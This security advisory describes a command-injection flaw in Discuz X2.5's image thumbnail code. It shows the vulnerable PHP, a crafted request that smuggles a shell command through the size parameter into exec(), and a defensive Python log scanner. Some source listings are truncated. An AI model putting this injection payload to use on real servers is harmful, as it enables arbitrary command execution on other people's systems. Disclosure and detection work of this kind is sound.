Discuz X2.5 /source/class/class_image.php Command Execution Vulnerability

2015-01-23T00:00:00
ID SSV:89024
Type seebug
Reporter Root
Modified 2015-01-23T00:00:00

Description

  • /source/module/aforum/forum_image.php

```php
$nocache = !empty($_GET['nocache']) ? : ;   // the two branch values are missing in the original listing
$daid = intval($_GET['aid']);
$type = !empty($_GET['type']) ? $_GET['type'] : 'fixwr';
list($w, $h) = explode('x', $_GET['size']);  // $w and $h are the raw, unfiltered strings
$dw = intval($w);                            // filtered copies, used for the cache path
$dh = intval($h);                            // and for the signature check below
$thumbfile = 'image/'.$daid.'_'.$dw.'_'.$dh.'.jpg';
$parse = parse_url($_G['setting']['attachurl']);
$attachurl = !isset($parse['host']) ? $_G['siteurl'].$_G['setting']['attachurl'] : $_G['setting']['attachurl'];
if(!$nocache) {
    if(file_exists($_G['setting']['attachdir'].$thumbfile)) {
        dheader('location: '.$attachurl.$thumbfile);
    }
}

define('NOROBOT', TRUE);

$id = !empty($_GET['atid']) ? $_GET['atid'] : $daid;
if(dsign($id.'|'.$dw.'|'.$dh) != $_GET['key']) {   // signature covers $dw/$dh, not the raw $w/$h
    dheader('location: '.$_G['siteurl'].'static/image/common/none.gif');
}

if($attach = C::t('forum_attachment_n')->fetch('aid:'.$daid, $daid, array(1, -1))) {
    if(!$dw && !$dh && $attach['tid'] != $id) {
        dheader('location: '.$_G['siteurl'].'static/image/common/none.gif');
    }
    dheader('Expires: '.gmdate('D, d M Y H:i:s', TIMESTAMP +   ).' GMT');   // offset missing in the original listing
    if($attach['remote']) {
        $filename = $_G['setting']['ftp']['attachurl'].'forum/'.$attach['attachment'];
    } else {
        $filename = $_G['setting']['attachdir'].'forum/'.$attach['attachment'];
    }
    require_once libfile('class/image');
    $img = new image;
    if($img->Thumb($filename, $thumbfile, $w, $h, $type)) {   // raw $w/$h passed instead of $dw/$dh
```

The variables passed into the Thumb method are $w and $h, not the filtered $dw and $dh.

  • /source/class/class_image.php

```php
function Thumb($source, $target, $thumbwidth, $thumbheight, $thumbtype = 1, $nosuffix = 0) {
    $return = $this->init('thumb', $source, $target, $nosuffix);
    if($return <= 0) {
        return $this->returncode($return);
    }

    if($this->imginfo['animated']) {
        return $this->returncode(0);
    }
    $this->param['thumbwidth'] = $thumbwidth;   // stored exactly as received, no validation
    if(!$thumbheight || $thumbheight > $this->imginfo['height']) {
        // next line is truncated in the original listing
        $thumbheight = $thumbwidth > $this->imginfo['width'] ? $this->imginfo['height'] : $this->imginfo['height
    }
    $this->param['thumbheight'] = $thumbheight;
    $this->param['thumbtype'] = $thumbtype;
    if($thumbwidth < 100 && $thumbheight < 100) {
        $this->param['thumbquality'] = 100;
    }

    $return = !$this->libmethod ? $this->Thumb_GD() : $this->Thumb_IM();
```

The parameters are still unfiltered when they are stored in $this->param, and from there they reach the Thumb_IM method.

```php
function Thumb_IM() {
    switch($this->param['thumbtype']) {
        case 'fixnone':
        case 1:
            // the next two lines are truncated in the original listing
            if($this->imginfo['width'] > $this->param['thumbwidth'] || $this->imginfo['height'] > $this->param['
                $exec_str = $this->param['imageimpath'].'/convert -quality '.intval($this->param['thumbquality']
                $return = exec($exec_str);   // the unescaped width/height are now part of a shell command line
                if(!file_exists($this->target)) {
                    return -3;
                }
            }
            break;
```

The parameters are passed into exec() and executed, which leads to arbitrary command execution. Because intval() still turns the tampered value into 300, $dw and $dh (and therefore the signature check and cache path) are unaffected, while the raw $h carries the extra shell text into the -geometry argument.

When a user submits:

```text
mod=image&aid=71&size=300x300||echo%20aaa>1.TXT%20%23&key=222dfc26b07dcd6a&nocache=yes&type=fixnone
```

the command executed is:

```text
/bin/convert -quality 100 -geometry 300x300||echo aaa>1.TXT # /var/www/html/discuzx2.5/upload/./data/attachment/forum/201501/16/143552dnewxwoxwsooezea.jpg /var/www/html/discuzx2.5/upload/./data/attachment/./image/71_300_300.jpg
```

Web root directory:

![67F3866B-4271-4B5C-A928-171494D73DFA.png](https://images.seebug.org/@/uploads/1433907619885-67F3866B-4271-4B5C-A928-171494D73DFA.png)
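As an added defender-side example (not part of the advisory or of Discuz), the Python below reproduces the two parses forum_image.php performs on the `size` parameter, so the filtered `$dw`/`$dh` can be compared with the raw `$w`/`$h` that reach `-geometry`, and scans constructed access-log lines for mod=image requests whose `size` is not a plain WIDTHxHEIGHT. The log lines and the strict regex are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jan/2015:10:00:01 +0800] "GET /forum.php?mod=image&aid=71&size=300x300&key=222dfc26b07dcd6a HTTP/1.1" 200 5120
10.0.0.9 - - [23/Jan/2015:10:00:07 +0800] "GET /forum.php?mod=image&aid=71&size=300x300%7C%7Cecho%20aaa%3E1.TXT%20%23&key=222dfc26b07dcd6a&nocache=yes&type=fixnone HTTP/1.1" 200 5120
10.0.0.7 - - [23/Jan/2015:10:00:09 +0800] "GET /forum.php?mod=image&aid=72&size=120x90&key=0123456789abcdef HTTP/1.1" 302 0
"""

STRICT_SIZE = re.compile(r"\d{1,4}x\d{1,4}")  # what a validated size parameter must look like

def php_intval(s):
    """Mimic PHP intval() on a string: leading integer, otherwise 0."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0

def php_size_parse(size):
    """forum_image.php: list($w,$h) = explode('x', $size); intval() each; returns (w, h, dw, dh)."""
    parts = size.split("x")
    w = parts[0]
    h = parts[1] if len(parts) > 1 else ""   # an undefined $h behaves like 0 in PHP
    return w, h, php_intval(w), php_intval(h)

def audit_request(url):
    """Return an analysis dict for a mod=image request, or None for any other request."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if qs.get("mod", [""])[0] != "image" or "size" not in qs:
        return None
    raw = qs["size"][0]
    w, h, dw, dh = php_size_parse(raw)
    return {
        "raw_size": raw,
        "sanitized": f"{dw}x{dh}",        # the $dw/$dh that dsign() and the cache path use
        "passed_to_convert": f"{w}x{h}",  # the $w/$h that reach Thumb() and -geometry
        "suspicious": STRICT_SIZE.fullmatch(raw) is None,
    }

def scan_log(text):
    """Return (client_ip, analysis) for every suspicious mod=image request in the log text."""
    findings = []
    for line in text.splitlines():
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        result = audit_request(m.group(1))
        if result and result["suspicious"]:
            findings.append((line.split()[0], result))
    return findings
```

The same strict check, applied server-side before `explode()`, is what keeps shell metacharacters out of `$w`/`$h`; the `sanitized` field shows why the signed `key` for 300x300 stays valid even when the raw value has been tampered with.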